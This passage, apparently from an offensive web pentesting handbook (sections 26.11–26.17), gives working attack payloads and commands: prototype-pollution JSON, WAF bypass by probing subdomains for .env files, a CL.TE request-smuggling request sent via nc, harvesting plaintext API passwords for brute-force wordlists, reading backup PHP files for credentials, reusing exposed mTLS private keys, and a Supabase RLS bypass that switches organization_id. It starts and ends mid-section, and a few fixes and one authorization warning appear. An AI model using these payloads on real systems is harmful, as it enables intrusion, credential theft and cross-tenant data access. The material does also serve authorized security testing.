&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -d &lt;span style="color:#a6d189"&gt;&amp;#39;{&amp;#34;to&amp;#34;:&amp;#34;dest2&amp;#34;,&amp;#34;amount&amp;#34;:50,&amp;#34;otp&amp;#34;:&amp;#34;USED_CODE&amp;#34;}&amp;#39;&lt;/span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# same OTP already used&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="2611-prototype-pollution--detection-and-exploit" &gt;
&lt;div&gt;
&lt;a href="#2611-prototype-pollution--detection-and-exploit"&gt;
##
&lt;/a&gt;
26.11 Prototype Pollution — Detection and Exploit
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-javascript" data-lang="javascript"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;// 1. Test injection via JSON merge
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;POST &lt;span style="color:#99d1db;font-weight:bold"&gt;/&lt;/span&gt;api&lt;span style="color:#99d1db;font-weight:bold"&gt;/&lt;/span&gt;profile
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;{&lt;span style="color:#a6d189"&gt;&amp;#34;__proto__&amp;#34;&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;:&lt;/span&gt; {&lt;span style="color:#a6d189"&gt;&amp;#34;isAdmin&amp;#34;&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;true&lt;/span&gt;}}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;// or
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;{&lt;span style="color:#a6d189"&gt;&amp;#34;constructor&amp;#34;&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;:&lt;/span&gt; {&lt;span style="color:#a6d189"&gt;&amp;#34;prototype&amp;#34;&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;:&lt;/span&gt; {&lt;span style="color:#a6d189"&gt;&amp;#34;isAdmin&amp;#34;&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;true&lt;/span&gt;}}}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;// 2. Check whether the pollution affects authorization
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;GET &lt;span style="color:#99d1db;font-weight:bold"&gt;/&lt;/span&gt;api&lt;span style="color:#99d1db;font-weight:bold"&gt;/&lt;/span&gt;admin&lt;span style="color:#99d1db;font-weight:bold"&gt;/&lt;/span&gt;dashboard
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;// If 200 with the polluted header → prototype pollution confirmed
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;// 3. Search for sinks in the JS bundles
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;// Static analysis of the bundles:
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;rg &lt;span style="color:#a6d189"&gt;&amp;#39;__proto__|constructor\[|prototype\[&amp;#39;&lt;/span&gt; bundle.js
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;rg &lt;span style="color:#a6d189"&gt;&amp;#39;\.innerHTML\s*=&amp;#39;&lt;/span&gt; bundle.js &lt;span style="color:#e78284"&gt;#&lt;/span&gt; DOM XSS sinks
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;rg &lt;span style="color:#a6d189"&gt;&amp;#39;eval\(|new Function\(&amp;#39;&lt;/span&gt; bundle.js &lt;span style="color:#e78284"&gt;#&lt;/span&gt; Code execution sinks
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;rg &lt;span style="color:#a6d189"&gt;&amp;#39;Math\.random\(\)&amp;#39;&lt;/span&gt; bundle.js &lt;span style="color:#e78284"&gt;#&lt;/span&gt; Weak randomness
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;rg &lt;span style="color:#a6d189"&gt;&amp;#39;\.merge\(|Object\.assign\(&amp;#39;&lt;/span&gt; bundle.js &lt;span style="color:#e78284"&gt;#&lt;/span&gt; Unsafe merges
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="2612-akamaicdn-waf-bypass-via-direct-subdomains" &gt;
&lt;div&gt;
&lt;a href="#2612-akamaicdn-waf-bypass-via-direct-subdomains"&gt;
##
&lt;/a&gt;
26.12 Akamai/CDN WAF Bypass via Direct Subdomains
&lt;/div&gt;
&lt;/h3&gt;
&lt;p&gt;Admin/internal subdomains often do NOT pass through the WAF:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 1. Enumerate ALL subdomains&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;subfinder -d target.com | httpx -o alive.txt
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 2. Test each one for WAF bypass&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;while&lt;/span&gt; &lt;span style="color:#99d1db"&gt;read&lt;/span&gt; sub; &lt;span style="color:#ca9ee6"&gt;do&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; curl -sk -o /dev/null -w &lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$sub&lt;/span&gt;&lt;span style="color:#a6d189"&gt;: %{http_code}\n&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;https://&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$sub&lt;/span&gt;&lt;span style="color:#a6d189"&gt;/.env&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;done&lt;/span&gt; &amp;lt; alive.txt
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 3. Subdomains returning 200/403 (exists) vs 406/blocked (WAF):&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# admin.target.com → 403 (exists, no WAF!) ← BYPASS!&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# www.target.com → 406 (blocked by the WAF)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# api.target.com → 200 (exists, no WAF!) ← BYPASS!&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;strong&gt;Subdomain patterns that frequently bypass WAF&lt;/strong&gt;:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;admin.*&lt;/code&gt;, &lt;code&gt;dashboard.*&lt;/code&gt;, &lt;code&gt;internal.*&lt;/code&gt;, &lt;code&gt;dev.*&lt;/code&gt;, &lt;code&gt;staging.*&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;*hmg.*&lt;/code&gt;, &lt;code&gt;*homolog.*&lt;/code&gt; (staging)&lt;/li&gt;
&lt;li&gt;&lt;code&gt;*-int.*&lt;/code&gt;, &lt;code&gt;*internal.*&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Server&amp;rsquo;s direct IP (discover via DNS history)&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="2613-http-request-smuggling--the-basics" &gt;
&lt;div&gt;
&lt;a href="#2613-http-request-smuggling--the-basics"&gt;
##
&lt;/a&gt;
26.13 HTTP Request Smuggling — The Basics
&lt;/div&gt;
&lt;/h3&gt;
&lt;p&gt;HTTP Smuggling occurs when the front-end (proxy/CDN) and back-end disagree on where one request ends and the next begins.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Main variants&lt;/strong&gt;:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Variant&lt;/th&gt;
&lt;th&gt;Front-end uses&lt;/th&gt;
&lt;th&gt;Back-end uses&lt;/th&gt;
&lt;th&gt;How to detect&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;CL.TE&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Content-Length&lt;/td&gt;
&lt;td&gt;Transfer-Encoding&lt;/td&gt;
&lt;td&gt;Send both conflicting headers&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;TE.CL&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Transfer-Encoding&lt;/td&gt;
&lt;td&gt;Content-Length&lt;/td&gt;
&lt;td&gt;Inverse&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;TE.TE&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;TE (one value)&lt;/td&gt;
&lt;td&gt;TE (another value)&lt;/td&gt;
&lt;td&gt;Obfuscate one of the TE headers&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;H2.CL&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;HTTP/2 Content-Length&lt;/td&gt;
&lt;td&gt;HTTP/1.1 Content-Length&lt;/td&gt;
&lt;td&gt;Downgrade H2→H1&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;H2.TE&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;HTTP/2&lt;/td&gt;
&lt;td&gt;HTTP/1.1 Transfer-Encoding&lt;/td&gt;
&lt;td&gt;Inject TE in the downgrade&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Basic CL.TE test:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#99d1db"&gt;printf&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#39;POST / HTTP/1.1\r\nHost: TARGET\r\nContent-Length: 50\r\nTransfer-Encoding: chunked\r\n\r\n0\r\n\r\nGET /admin HTTP/1.1\r\nHost: localhost\r\n\r\n&amp;#39;&lt;/span&gt; | nc TARGET &lt;span style="color:#ef9f76"&gt;80&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Burp Suite: HTTP Request Smuggler extension&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Tools: smuggler.py, h2csmuggler&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;strong&gt;⚠️ Smuggling is complex and dangerous&lt;/strong&gt; — it can affect real traffic from other users. Only test with explicit authorization.&lt;/p&gt;
&lt;h3 id="2614-plaintext-passwords-in-api-responses" &gt;
&lt;div&gt;
&lt;a href="#2614-plaintext-passwords-in-api-responses"&gt;
##
&lt;/a&gt;
26.14 Plaintext Passwords in API Responses
&lt;/div&gt;
&lt;/h3&gt;
&lt;p&gt;APIs that return passwords in plaintext (this should never happen, but it does):&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Find endpoints that return credentials&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET.com/api/admins&amp;#34;&lt;/span&gt; | jq &lt;span style="color:#a6d189"&gt;&amp;#39;.[] | {email, password}&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# → &amp;#34;password&amp;#34;:&amp;#34;Pratibha7231@&amp;#34; (plaintext!)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET.com/api/users&amp;#34;&lt;/span&gt; | jq &lt;span style="color:#a6d189"&gt;&amp;#39;.[] | {user, pass, hash}&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# → &amp;#34;pass&amp;#34;:&amp;#34;Admin@123&amp;#34; (plaintext!)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;If found, extract ALL credentials and look for patterns (common suffix, year, company name) to generate brute-force wordlists.&lt;/p&gt;
&lt;h3 id="2615-backup-php-files--source-code-with-credentials" &gt;
&lt;div&gt;
&lt;a href="#2615-backup-php-files--source-code-with-credentials"&gt;
##
&lt;/a&gt;
26.15 Backup PHP Files — Source Code with Credentials
&lt;/div&gt;
&lt;/h3&gt;
&lt;p&gt;&lt;code&gt;.php.backup&lt;/code&gt;, &lt;code&gt;.php.bak&lt;/code&gt;, &lt;code&gt;.php~&lt;/code&gt; files often expose source code:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# List the directory (if directory listing is enabled)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;http://TARGET:8085/&amp;#34;&lt;/span&gt; | grep -E &lt;span style="color:#a6d189"&gt;&amp;#39;\.php|\.backup|\.bak|\.old|\.ini&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Read the backup (served as text, not executed as PHP)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;http://TARGET:8085/abrir-suporte.php.backup&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# → Source code with a hardcoded API token:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# $api_token = &amp;#34;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx&amp;#34;;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;http://TARGET:8085/config.php.bak&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# → DB credentials: host, user, password, database&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="2616-mtls-certificate-export" &gt;
&lt;div&gt;
&lt;a href="#2616-mtls-certificate-export"&gt;
##
&lt;/a&gt;
26.16 mTLS Certificate Export
&lt;/div&gt;
&lt;/h3&gt;
&lt;p&gt;Certificates with their private key exposed in public directories:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# If you find a .pem certificate with a private key (no passphrase):&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;http://TARGET:8085/certificates/certificado.pem&amp;#34;&lt;/span&gt; | head -20
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# -----BEGIN CERTIFICATE-----&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# ...&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# -----END CERTIFICATE-----&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# -----BEGIN PRIVATE KEY----- ← PRIVATE KEY INCLUDED!&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# ...&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Use it to authenticate against APIs that require mTLS:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl --cert certificado.pem &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;https://api.banco.com/v1/charge/123&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -H &lt;span style="color:#a6d189"&gt;&amp;#34;Authorization: Bearer &lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$TOKEN&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Enumerate all certificates in the directory&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;for&lt;/span&gt; id in &lt;span style="color:#ca9ee6"&gt;$(&lt;/span&gt;seq &lt;span style="color:#ef9f76"&gt;1&lt;/span&gt; 100&lt;span style="color:#ca9ee6"&gt;)&lt;/span&gt;; &lt;span style="color:#ca9ee6"&gt;do&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; curl -s -o /dev/null -w &lt;span style="color:#a6d189"&gt;&amp;#34;%{http_code}\n&amp;#34;&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;http://TARGET:8085/certificates/cert-&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$id&lt;/span&gt;&lt;span style="color:#a6d189"&gt;.pem&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;done&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="2617-supabase--advanced-techniques" &gt;
&lt;div&gt;
&lt;a href="#2617-supabase--advanced-techniques"&gt;
##
&lt;/a&gt;
26.17 Supabase — Advanced Techniques
&lt;/div&gt;
&lt;/h3&gt;
&lt;h4 id="rls-bypass-via-cross-organization-idor" &gt;
&lt;div&gt;
&lt;a href="#rls-bypass-via-cross-organization-idor"&gt;
###
&lt;/a&gt;
RLS Bypass via Cross-Organization IDOR
&lt;/div&gt;
&lt;/h4&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# If a table has RLS but allows UPDATE of your own profile WITHOUT checking organization_id:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -X PATCH &lt;span style="color:#a6d189"&gt;&amp;#34;https://{PROJECT}.supabase.co/rest/v1/profiles?id=eq.{MY_ID}&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -H &lt;span style="color:#a6d189"&gt;&amp;#34;apikey: {ANON_KEY}&amp;#34;&lt;/span&gt; -H &lt;span style="color:#a6d189"&gt;&amp;#34;Authorization: Bearer {ANON_KEY}&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -d &lt;span style="color:#a6d189"&gt;&amp;#39;{&amp;#34;organization_id&amp;#34;:&amp;#34;TARGET_ORG_UUID&amp;#34;}&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# → Now you see the target organization&amp;#39;s dashboard&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# SQL Fix:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# ALTER POLICY profile_update ON public.profiles&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# WITH CHECK (organization_id = (SELECT organization_id FROM profiles WHERE id = auth.uid()));&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h4 id="rpc-functions-without-organization-filter" &gt;
&lt;div&gt;
&lt;a href="#rpc-functions-without-organization-filter"&gt;
###
&lt;/a&gt;
RPC Functions without Organization Filter
&lt;/div&gt;
&lt;/h4&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# RPC functions often return GLOBAL data:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;https://{PROJECT}.supabase.co/rest/v1/rpc/get_stats&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -H &lt;span style="color:#a6d189"&gt;&amp;#34;apikey: {ANON_KEY}&amp;#34;&lt;/span&gt; -H &lt;span style="color:#a6d189"&gt;&amp;#34;Authorization: Bearer {ANON_KEY}&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# → Returns statistics from ALL organizations, not just yours&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# SQL Fix: Add SECURITY DEFINER + WHERE org_id = ...&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h4 id="multi-tenant-enumeration-via-whois" &gt;
&lt;div&gt;
&lt;a href="#multi-tenant-enumeration-via-whois"&gt;
###
&lt;/a&gt;
Multi-Tenant Enumeration via WHOIS
&lt;/div&gt;
&lt;/h4&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 1. Get the email from the target domain&amp;#39;s WHOIS&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;whois target.com | grep -i &lt;span style="color:#a6d189"&gt;&amp;#34;email\|@&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 2. Find other domains owned by the same owner&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# → reverse WHOIS, crt.sh, Google dorks&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
